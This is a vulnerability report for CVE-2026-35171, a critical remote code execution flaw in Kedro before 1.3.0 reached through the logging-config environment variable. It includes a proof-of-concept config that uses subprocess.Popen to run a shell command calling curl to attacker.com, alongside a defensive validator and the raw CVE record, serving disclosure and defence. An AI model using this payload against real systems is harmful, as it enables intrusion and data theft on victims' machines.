Security Vulnerability Report

CVE-2026-35171

Published: 2026-04-06 18:16:43
Last Modified: 2026-04-14 15:36:22

Description

Kedro is a toolbox for production-ready data science. Prior to 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup. This is a critical remote code execution (RCE) vulnerability caused by unsafe use of logging.config.dictConfig() with user-controlled input. This vulnerability is fixed in 1.3.0.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:kedro:*:*:*:*:*:python:*:* - VULNERABLE
Kedro < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# malicious_config.py
import os

# Malicious logging configuration exploiting the dictConfig feature
LOGGING_CONFIG = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'standard': {
            'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
        }
    },
    'handlers': {
        # Exploit: Use the special '()' key to instantiate subprocess.Popen
        'exploit': {
            '()': 'subprocess.Popen',
            'args': (['/bin/sh', '-c', 'touch /tmp/pwned; curl http://attacker.com/exfil'],)
        }
    },
    'root': {
        'level': 'INFO',
        'handlers': ['exploit']
    }
}

# Attacker sets environment variable:
# export KEDRO_LOGGING_CONFIG=/path/to/malicious_config.py
```
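The description explains that `logging.config.dictConfig()` will import and call whatever callable a `()` key names, which is why a config loaded from an attacker-controlled path becomes code execution. As an added defender-side example (not Kedro's code and not the upstream fix), the validator below walks a dictConfig-style dictionary before it is applied and rejects any `()` factory that is not on an explicit allowlist and any `class` outside the standard `logging` package; the two sample configs are constructed for illustration.

```python
import logging.config
from typing import Any, List

# '()' factories a config may name; empty by default, so every factory is rejected.
ALLOWED_FACTORIES = frozenset()
# Module prefixes a handler/formatter/filter 'class' may resolve to.
ALLOWED_CLASS_PREFIXES = ("logging.",)

class UnsafeLoggingConfig(ValueError):
    """A config entry would make dictConfig import and call arbitrary code."""

def find_unsafe_entries(node: Any, path: str = "") -> List[str]:
    """Walk a dictConfig-style dict; report every '()' factory that is not
    allowlisted and every 'class' outside the logging.* namespace."""
    problems = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else str(key)
            if key == "()" and not (isinstance(value, str) and value in ALLOWED_FACTORIES):
                problems.append(f"{here}: factory {value!r} is not allowlisted")
            elif key == "class" and not (
                isinstance(value, str) and value.startswith(ALLOWED_CLASS_PREFIXES)
            ):
                problems.append(f"{here}: class {value!r} is outside logging.*")
            problems.extend(find_unsafe_entries(value, here))  # nested dicts/lists
    elif isinstance(node, (list, tuple)):
        for i, item in enumerate(node):
            problems.extend(find_unsafe_entries(item, f"{path}[{i}]"))
    return problems

def safe_dict_config(config: dict) -> List[str]:
    """Validate first, then apply; returns the (empty) problem list on success."""
    problems = find_unsafe_entries(config)
    if problems:
        raise UnsafeLoggingConfig("; ".join(problems))
    logging.config.dictConfig(config)
    return problems

# Constructed sample configs (not from the advisory): one benign, one abusing '()'.
BENIGN_CONFIG = {
    "version": 1,
    "handlers": {"null": {"class": "logging.NullHandler"}},
    "root": {"level": "INFO", "handlers": ["null"]},
}
MALICIOUS_CONFIG = {
    "version": 1,
    "handlers": {"exploit": {"()": "subprocess.Popen"}},
    "root": {"level": "INFO", "handlers": ["exploit"]},
}
```

Legitimate custom factories can be named in `ALLOWED_FACTORIES`; the point is that the decision is made by the application, not by whoever controls the file named in an environment variable.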

References

https://github.com/kedro-org/kedro/security/advisories/GHSA-9cqf-439c-j96r (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35171",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-06T18:16:43.373",
    "lastModified": "2026-04-14T15:36:21.790",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Kedro is a toolbox for production-ready data science. Prior to 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup. This is a critical remote code execution (RCE) vulnerability caused by unsafe use of logging.config.dictConfig() with user-controlled input. This vulnerability is fixed in 1.3.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-94"},
          {"lang": "en", "value": "CWE-502"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linuxfoundation:kedro:*:*:*:*:*:python:*:*",
                "versionEndExcluding": "1.3.0",
                "matchCriteriaId": "24F97BC8-D0B5-4D19-A22A-81F2A4FDED0E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/kedro-org/kedro/security/advisories/GHSA-9cqf-439c-j96r",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```